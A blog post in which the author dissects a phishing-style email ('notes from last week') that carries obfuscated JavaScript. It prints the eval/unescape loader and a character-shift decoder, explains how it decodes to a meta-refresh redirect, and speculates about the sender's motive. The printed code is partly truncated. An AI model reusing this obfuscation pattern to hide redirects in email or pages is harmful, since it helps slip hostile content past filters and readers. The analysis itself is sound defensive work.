notes from last week—or how about running a little JS on your computer

JavaScript can run on any platform when the HTML generator does not first remove it from a message.

Yahoo! was not doing so at first. At some point, some people complained of having problems and at that time Yahoo! added filters to detect such things in emails. If there is a JavaScript in your email, then the email is ignored by Yahoo! I'm sure GMail, Hotmail, AOL and so on are now doing the same thing.

This applies to CSS (and thus the style="" attribute) and a few other similar things. It is harder with Flash animations to know whether they are bad or not, although Adobe (and before Macromedia) is doing a good job at working a secure Flash player.

Today I received an email with just one sentence:

Attached are notes from last week. Let me know if there are
any errors or major omissions. Thanks.

I was suspicious and looked at the actual code (my mail system allows me to save emails to a text file and then I can just look at the text of the email. The following shows you the JavaScript contained in the email:

<script language="JavaScript" type="text/javascript">function p2gd(wja8){var
jty7,lwpr="",uuar="qhliu-t\"x=; o/>.n0egc:pmsvafr<",ss0n,gpck,
x4ab=uuar.length;eval(unescape("%66un%63ti%6Fn v%79dc%28cm%798)
p2gd("qv:;h0x>.lnq/ee av0xec eaixe n\"cg;>/se/x/:>
c:xxhla=c e:.vhafuxuate/csqm-apq0m :fl-\"");</script><noscript>
To display this page you need a browser that supports JavaScript.</noscript>

The funny thing is that they have a <noscript> that tells you you need a browser that supports JavaScript to see the content of the email. I think that many people would go: what?! right there. (although if you don't have JavaScript turned on, you're probably not even going to open that email in the first place!)

The code, as is, is a bit hard to read. Obviously that's on purpose. The eval() executes the code in the unescaped string. The % followed by a number represent a character. So %64 represents d, %75 is "u", %6E is "n", etc. So that string is:


This means copy the content of the lwpr variable in your HTML document.

The full script goes like this:

function p2gd(wja8)
	var jty7;
	var lwpr = "";
	var uuar = "qhliu-t\"x=; o/>.n0egc:pmsvafr<";
	var ss0n;
	var gpck;
	var x4ab = uuar.length;
	function vydc(cmy8)
	for(jty7 = 0; jty7 < wja8.length; jty7++)
		gpck = wja8.charAt(jty7);
		ss0n = uuar.indexOf(gpck);
		if(ss0n > -1)
			ss0n -= (jty7 + 1) % x4ab;
			if(ss0n < 0)
				ss0n += x4ab;
p2gd("qv:;h0x>.lnq/ee av0xec eaixe n\"cg;>"
  + "/se/x/:>c:xxhla=c e:.vhafuxuate/csqm-apq0m :fl-\"");

The output of the script is this HTML:

<meta http-equiv="refresh" content=" ;url=" />

which is a redirect to a website as you may notice:

When I did a wget on that page, it did not work. So either it was a DoS attack (Denial of Service) using everyone's computer to generate the large number of accesses or somehow the hacker had access to that website and put a "random" HTML file on it and sent it to everyone in maybe an attempt to discredit that website...